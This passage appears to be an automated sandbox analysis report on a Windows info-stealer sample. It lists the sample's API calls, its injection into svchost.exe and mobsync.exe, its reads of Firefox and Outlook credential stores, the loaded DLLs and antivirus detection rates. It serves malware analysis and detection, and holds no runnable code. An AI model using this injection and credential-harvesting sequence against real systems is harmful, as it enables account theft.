                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03872DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk,2_2_038735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874340 NtSetContextThread,2_2_03874340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874650 NtSuspendThread,2_2_03874650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B80 NtQueryInformationFile,2_2_03872B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BA0 NtEnumerateValueKey,2_2_03872BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BE0 NtQueryValueKey,2_2_03872BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BF0 NtAllocateVirtualMemory,2_2_03872BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AB0 NtWaitForSingleObject,2_2_03872AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AD0 NtReadFile,2_2_03872AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AF0 NtWriteFile,2_2_03872AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F90 NtProtectVirtualMemory,2_2_03872F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FA0 NtQuerySection,2_2_03872FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FB0 NtResumeThread,2_2_03872FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FE0 NtCreateFile,2_2_03872FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F30 NtCreateSection,2_2_03872F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F60 NtCreateProcessEx,2_2_03872F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E80 NtReadVirtualMemory,2_2_03872E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EA0 NtAdjustPrivilegesToken,2_2_03872EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EE0 NtQueueApcThread,2_2_03872EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E30 NtWriteVirtualMemory,2_2_03872E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DB0 NtEnumerateKey,2_2_03872DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DD0 NtDelayExecution,2_2_03872DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D00 NtSetInformationFile,2_2_03872D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D10 NtMapViewOfSection,2_2_03872D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D30 NtUnmapViewOfSection,2_2_03872D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CA0 NtQueryInformationToken,2_2_03872CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CC0 NtQueryVirtualMemory,2_2_03872CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CF0 NtOpenProcess,2_2_03872CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C00 NtQueryInformationProcess,2_2_03872C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C60 NtCreateKey,2_2_03872C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C70 NtFreeVirtualMemory,2_2_03872C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873090 NtSetValueKey,2_2_03873090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873010 NtOpenDirectoryObject,2_2_03873010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038739B0 NtGetContextThread,2_2_038739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D10 NtOpenProcessToken,2_2_03873D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D70 NtOpenThread,2_2_03873D70
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_006FA1EF
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006E8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_006E8310
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006F51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006F51BD
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_0069E6A00_2_0069E6A0
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006BD9750_2_006BD975
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_0069FCE00_2_0069FCE0
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006B21C50_2_006B21C5
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006C62D20_2_006C62D2
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_007103DA0_2_007103DA
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006C242E0_2_006C242E
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006B25FA0_2_006B25FA
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006EE6160_2_006EE616
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006A66E10_2_006A66E1
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006C878F0_2_006C878F
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_007108570_2_00710857
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006C68440_2_006C6844
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006A88080_2_006A8808
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006F88890_2_006F8889
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006BCB210_2_006BCB21
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006C6DB60_2_006C6DB6
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006A6F9E0_2_006A6F9E
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006A30300_2_006A3030
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006BF1D90_2_006BF1D9
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006B31870_2_006B3187
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006912870_2_00691287
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006B14840_2_006B1484
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006A55200_2_006A5520
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006B76960_2_006B7696
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006A57600_2_006A5760
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006B19780_2_006B1978
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006C9AB50_2_006C9AB5
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00717DDB0_2_00717DDB
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006BBDA60_2_006BBDA6
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006B1D900_2_006B1D90
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_0069DF000_2_0069DF00
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006A3FE00_2_006A3FE0
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00D542300_2_00D54230
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004183B32_2_004183B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029292_2_00402929
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029302_2_00402930
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012002_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EAA32_2_0042EAA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FBF32_2_0040FBF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402DF02_2_00402DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DDF32_2_0040DDF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025902_2_00402590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004165B32_2_004165B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE132_2_0040FE13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF432_2_0040DF43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF372_2_0040DF37
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F02_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039003E62_2_039003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA3522_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C02C02_2_038C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E02742_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F41A22_2_038F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039001AA2_2_039001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F81CC2_2_038F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038301002_2_03830100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA1182_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C81582_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D20002_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C02_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038647502_2_03864750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038407702_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C6E02_2_0385C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039005912_2_03900591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038405352_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EE4F62_2_038EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E44202_2_038E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F24462_2_038F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F6BD72_2_038F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB402_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA802_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A02_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390A9A62_2_0390A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038569622_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038268B82_2_038268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E8F02_2_0386E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384A8402_2_0384A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038428402_2_03842840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BEFA02_2_038BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832FC82_2_03832FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384CFE02_2_0384CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03882F282_2_03882F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860F302_2_03860F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E2F302_2_038E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4F402_2_038B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852E902_2_03852E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FCE932_2_038FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEEDB2_2_038FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEE262_2_038FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840E592_2_03840E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03858DBF2_2_03858DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383ADE02_2_0383ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384AD002_2_0384AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DCD1F2_2_038DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0CB52_2_038E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830CF22_2_03830CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840C002_2_03840C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0388739A2_2_0388739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F132D2_2_038F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382D34C2_2_0382D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A02_2_038452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C02_2_0385B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED2_2_038E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384B1B02_2_0384B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387516C2_2_0387516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F1722_2_0382F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390B16B2_2_0390B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF0CC2_2_038EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C02_2_038470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F70E92_2_038F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF0E02_2_038FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF7B02_2_038FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F16CC2_2_038F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038856302_2_03885630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DD5B02_2_038DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039095C32_2_039095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F75712_2_038F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF43F2_2_038FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038314602_2_03831460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FB802_2_0385FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B5BF02_2_038B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387DBF92_2_0387DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFB762_2_038FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DDAAC2_2_038DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03885AA02_2_03885AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E1AA32_2_038E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EDAC62_2_038EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFA492_2_038FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7A462_2_038F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B3A6C2_2_038B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D59102_2_038D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038499502_2_03849950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B9502_2_0385B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038438E02_2_038438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD8002_2_038AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841F922_2_03841F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFFB12_2_038FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03803FD22_2_03803FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03803FD52_2_03803FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFF092_2_038FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03849EB02_2_03849EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FDC02_2_0385FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03843D402_2_03843D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F1D5A2_2_038F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7D732_2_038F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFCF22_2_038FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B9C322_2_038B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: String function: 006B0AE3 appears 70 times
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: String function: 00697DE1 appears 36 times
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: String function: 006B8900 appears 42 times
                Source: tfWjjV1LdT.exe, 00000000.00000003.2086505362.00000000038AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs tfWjjV1LdT.exe
                Source: tfWjjV1LdT.exe, 00000000.00000003.2085455684.00000000036B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs tfWjjV1LdT.exe
                Source: tfWjjV1LdT.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@9/8
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FA06A GetLastError,FormatMessageW,0_2_006FA06A
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006E81CB AdjustTokenPrivileges,CloseHandle,0_2_006E81CB
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006E87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_006E87E1
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_006FB333
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_0070EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0070EE0D
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_007083BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_007083BB
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00694E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00694E89
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeFile created: C:\Users\user\AppData\Local\Temp\autE986.tmpJump to behavior
                Source: tfWjjV1LdT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: mobsync.exe, 00000005.00000002.3895710577.0000000003052000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2495032582.000000000305D000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3895710577.0000000003081000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2492295108.0000000003031000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2492476241.0000000003052000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: tfWjjV1LdT.exeVirustotal: Detection: 54%
                Source: tfWjjV1LdT.exeReversingLabs: Detection: 55%
                Source: unknownProcess created: C:\Users\user\Desktop\tfWjjV1LdT.exe "C:\Users\user\Desktop\tfWjjV1LdT.exe"
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\tfWjjV1LdT.exe"
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\tfWjjV1LdT.exe"Jump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeSection loaded: rasadhlp.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: tfWjjV1LdT.exeStatic file information: File size 1225216 > 1048576
                Source: tfWjjV1LdT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: tfWjjV1LdT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: tfWjjV1LdT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: tfWjjV1LdT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
